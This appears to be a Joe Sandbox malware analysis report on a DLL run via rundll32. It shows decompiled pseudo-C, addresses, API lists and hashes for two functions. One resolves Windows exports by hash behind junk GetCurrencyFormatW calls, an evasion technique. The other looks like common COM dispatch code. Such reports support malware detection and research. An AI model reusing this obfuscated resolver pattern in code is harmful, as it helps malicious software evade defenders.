                                                                                                            • Opcode ID: fa5ef0e6d9e371cfd272aca91c122599bb0de00c0ced2b86db92b24c7c9bf750
                                                                                                            • Instruction ID: 7666ce8964d8ee3f6bc6ffcfd40649ad75606c78465d6ba84a3d7def91f03792
                                                                                                            • Opcode Fuzzy Hash: fa5ef0e6d9e371cfd272aca91c122599bb0de00c0ced2b86db92b24c7c9bf750
                                                                                                            • Instruction Fuzzy Hash: F461B17190036AAFEB15DB60CC49F9E7BB8EF083D1F114154F509A6196DB34AE81CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001688 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 204COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E10001688(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				signed int _v8;
				intOrPtr _v12;
				int _v16;
				intOrPtr _v20;
				void* _t113;
				short* _t126;
				short* _t142;

				_t142 = L"xadqsavcbdfewescGADW";
				_t126 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v20 = (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 << 6) + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) * 0xf8;
				_v16 = (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) + _v16) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x3c)) + _a4;
				_v16 = _v16 + 0x78 + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d8 * 8;
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d4 * 0x28 +  *_v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440cc;
				_v12 =  *((intOrPtr*)(_v20 + 0x20)) + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 * 4 + _v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440cc << 2;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x1c)) + _v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0 + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x24)) + _v16 + _a4;
				_v16 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v20 + 0x18)) == 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t113 = E100014CF( *((intOrPtr*)(_v12 + (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440dc + _v16) * 4)) + _a4);
					_push(0x22b9);
					_push(_t142);
					_push(0);
					_push(_t126);
					_push(0x11d4);
					_push(0);
					if(_t113 == _a8) {
						break;
					}
					_v16 = _v16 + 1;
					if(_v16 < GetCurrencyFormatW(??, ??, ??, ??, ??, ??) *  *0x100440dc +  *((intOrPtr*)(_v20 + 0x18))) {
						continue;
					}
					goto L3;
				}
				_v8 =  *(_v8 + (GetCurrencyFormatW() *  *0x100440d4 + _v16) * 2) & 0x0000ffff;
				return  *((intOrPtr*)(_v4 + (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0 + _v8) * 4)) + _a4;
			}











                                                                                                            0x1000169a
                                                                                                            0x100016a2
                                                                                                            0x100016cc
                                                                                                            0x100016e4
                                                                                                            0x1000170c
                                                                                                            0x1000172d
                                                                                                            0x10001753
                                                                                                            0x1000176c
                                                                                                            0x10001797
                                                                                                            0x100017b3
                                                                                                            0x100017db
                                                                                                            0x100017f6
                                                                                                            0x10001818
                                                                                                            0x10001822
                                                                                                            0x10001836
                                                                                                            0x1000188f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10001838
                                                                                                            0x10001838
                                                                                                            0x1000185d
                                                                                                            0x10001867
                                                                                                            0x1000186c
                                                                                                            0x1000186d
                                                                                                            0x1000186f
                                                                                                            0x10001870
                                                                                                            0x10001871
                                                                                                            0x10001873
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10001875
                                                                                                            0x1000188d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000188d
                                                                                                            0x100018ba
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100016B0
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100016D0
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100016E8
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001710
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001731
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001757
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001770
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000179B
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100017B7
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100017DF
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100017FA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001826
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001844
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001879
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001899
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100018BE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 30569eb8c03e8ad6ff96c7b993bd8e32f972026cb2052b8f5c109cfadb6c887f
                                                                                                            • Instruction ID: 8a616b6614b71244b568cdf68a4d548a50dd06c55d0bd6723b2e1342b5ff1104
                                                                                                            • Opcode Fuzzy Hash: 30569eb8c03e8ad6ff96c7b993bd8e32f972026cb2052b8f5c109cfadb6c887f
                                                                                                            • Instruction Fuzzy Hash: 55614BB1A44315BFE204DB91CD86F1BBBECEB8AB48F111809F7409A2D1C671EA158F65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001DB64 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 46%
                                                                                                            			E1001DB64(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E1001FBC4(E10034A5C, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E1001FC9C(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10020F40(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x10038ec0;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 =  *(_t300 - 0x4c) - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if( *(_t300 - 0x4c) == _t257) {
					L37:
					_t295 = 0;
					E1001BDF4(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10020F40(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1003b19c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1001DB0D(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10004D75(_t257, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E1001CE04(_t300 - 0x68);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10004D75(_t257, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1001E0F4))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E10010B51(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E100050DA(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E10004D4A(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1001D564(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E10005422(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E10005422(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E10005422(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E100209E8(_t300 + 0x14, 0x10040d04);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t297 = E10004D4A(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10020F40(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1001E0A8))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E1001CA7C(_t300 - 0x34, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E1001CE9E(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10004D75(_t258, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1001E058))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E1000567F(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E10001260(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E10004E3A(__ebx, __ecx, __edi, __esi, __eflags);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}































                                                                                                            0x1001db64
                                                                                                            0x1001db6b
                                                                                                            0x1001db70
                                                                                                            0x1001db73
                                                                                                            0x1001db77
                                                                                                            0x1001e050
                                                                                                            0x1001e055
                                                                                                            0x1001e055
                                                                                                            0x1001db7d
                                                                                                            0x1001db80
                                                                                                            0x1001db83
                                                                                                            0x1001db86
                                                                                                            0x1001db90
                                                                                                            0x1001db93
                                                                                                            0x1001db98
                                                                                                            0x1001db9e
                                                                                                            0x1001dba9
                                                                                                            0x1001dba9
                                                                                                            0x1001dbb0
                                                                                                            0x1001dbb7
                                                                                                            0x1001dbbc
                                                                                                            0x1001dbc3
                                                                                                            0x1001dbc3
                                                                                                            0x1001dbc6
                                                                                                            0x1001dbcd
                                                                                                            0x1001dbd0
                                                                                                            0x1001dbd3
                                                                                                            0x1001dbd6
                                                                                                            0x1001dbd9
                                                                                                            0x1001dbdc
                                                                                                            0x1001dbe0
                                                                                                            0x1001dbe4
                                                                                                            0x1001dbe5
                                                                                                            0x1001de05
                                                                                                            0x1001de09
                                                                                                            0x1001de0b
                                                                                                            0x1001de14
                                                                                                            0x1001de16
                                                                                                            0x1001de16
                                                                                                            0x1001de23
                                                                                                            0x1001de2b
                                                                                                            0x1001de2d
                                                                                                            0x1001de59
                                                                                                            0x1001de5c
                                                                                                            0x1001de61
                                                                                                            0x1001de66
                                                                                                            0x1001de91
                                                                                                            0x1001de91
                                                                                                            0x1001de94
                                                                                                            0x1001de9d
                                                                                                            0x1001dea0
                                                                                                            0x1001df75
                                                                                                            0x1001df75
                                                                                                            0x1001df7b
                                                                                                            0x1001e032
                                                                                                            0x1001e035
                                                                                                            0x1001e039
                                                                                                            0x1001e03e
                                                                                                            0x1001e042
                                                                                                            0x1001e045
                                                                                                            0x1001e047
                                                                                                            0x1001e04a
                                                                                                            0x1001e04f
                                                                                                            0x00000000
                                                                                                            0x1001e045
                                                                                                            0x1001df85
                                                                                                            0x1001dfaa
                                                                                                            0x1001dfad
                                                                                                            0x1001dfb0
                                                                                                            0x1001dfb3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dfb5
                                                                                                            0x00000000
                                                                                                            0x1001dfc6
                                                                                                            0x1001dfcd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001e02a
                                                                                                            0x1001e02d
                                                                                                            0x1001e030
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dfe5
                                                                                                            0x1001dfe8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dfef
                                                                                                            0x1001dff2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dfd2
                                                                                                            0x1001dfd5
                                                                                                            0x1001dfd8
                                                                                                            0x1001dfda
                                                                                                            0x1001dfdd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dffc
                                                                                                            0x1001e001
                                                                                                            0x1001e004
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001e00c
                                                                                                            0x1001e00f
                                                                                                            0x1001e011
                                                                                                            0x1001e015
                                                                                                            0x1001e018
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001e01c
                                                                                                            0x1001e01f
                                                                                                            0x1001e022
                                                                                                            0x1001e023
                                                                                                            0x1001e024
                                                                                                            0x1001e025
                                                                                                            0x1001e026
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dfc2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dfb5
                                                                                                            0x1001df89
                                                                                                            0x1001df8e
                                                                                                            0x1001df94
                                                                                                            0x1001df96
                                                                                                            0x1001df98
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001df9e
                                                                                                            0x1001dfa4
                                                                                                            0x1001debc
                                                                                                            0x1001debc
                                                                                                            0x1001dec1
                                                                                                            0x1001dec1
                                                                                                            0x1001dec4
                                                                                                            0x1001decd
                                                                                                            0x1001decd
                                                                                                            0x1001ded2
                                                                                                            0x1001ded8
                                                                                                            0x1001dedb
                                                                                                            0x1001dedd
                                                                                                            0x1001dee1
                                                                                                            0x1001dee3
                                                                                                            0x1001deeb
                                                                                                            0x1001deec
                                                                                                            0x1001def2
                                                                                                            0x1001def2
                                                                                                            0x1001def4
                                                                                                            0x1001defa
                                                                                                            0x1001df00
                                                                                                            0x1001df08
                                                                                                            0x1001df10
                                                                                                            0x1001df13
                                                                                                            0x1001df13
                                                                                                            0x1001df1e
                                                                                                            0x1001df24
                                                                                                            0x1001df26
                                                                                                            0x1001df2d
                                                                                                            0x1001df32
                                                                                                            0x1001df35
                                                                                                            0x1001df35
                                                                                                            0x1001df3d
                                                                                                            0x1001df3f
                                                                                                            0x1001df46
                                                                                                            0x1001df4b
                                                                                                            0x1001df4e
                                                                                                            0x1001df4e
                                                                                                            0x1001df56
                                                                                                            0x1001df5b
                                                                                                            0x1001df61
                                                                                                            0x1001df6d
                                                                                                            0x1001df70
                                                                                                            0x00000000
                                                                                                            0x1001df70
                                                                                                            0x1001deaa
                                                                                                            0x1001deb0
                                                                                                            0x1001deb7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001deb9
                                                                                                            0x00000000
                                                                                                            0x1001de68
                                                                                                            0x1001de6b
                                                                                                            0x1001de71
                                                                                                            0x1001de8c
                                                                                                            0x1001de8c
                                                                                                            0x1001de8f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001de77
                                                                                                            0x1001de79
                                                                                                            0x1001de7b
                                                                                                            0x1001de81
                                                                                                            0x1001de82
                                                                                                            0x1001de88
                                                                                                            0x1001de88
                                                                                                            0x1001de8b
                                                                                                            0x1001de8b
                                                                                                            0x00000000
                                                                                                            0x1001de8b
                                                                                                            0x1001de7d
                                                                                                            0x1001de7f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001de7f
                                                                                                            0x00000000
                                                                                                            0x1001de8c
                                                                                                            0x1001dbeb
                                                                                                            0x1001dbef
                                                                                                            0x1001dbff
                                                                                                            0x1001dc0a
                                                                                                            0x1001dc0d
                                                                                                            0x1001dc15
                                                                                                            0x1001dc18
                                                                                                            0x1001dc1b
                                                                                                            0x1001dc21
                                                                                                            0x1001dc21
                                                                                                            0x1001dc25
                                                                                                            0x1001dc28
                                                                                                            0x1001dc2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dc31
                                                                                                            0x1001dc36
                                                                                                            0x1001dc39
                                                                                                            0x1001dc3f
                                                                                                            0x1001dc42
                                                                                                            0x1001dc45
                                                                                                            0x1001dc48
                                                                                                            0x1001dc4e
                                                                                                            0x1001dc51
                                                                                                            0x1001dc54
                                                                                                            0x1001dc5e
                                                                                                            0x1001dc5e
                                                                                                            0x1001dc61
                                                                                                            0x1001dc69
                                                                                                            0x1001dc6b
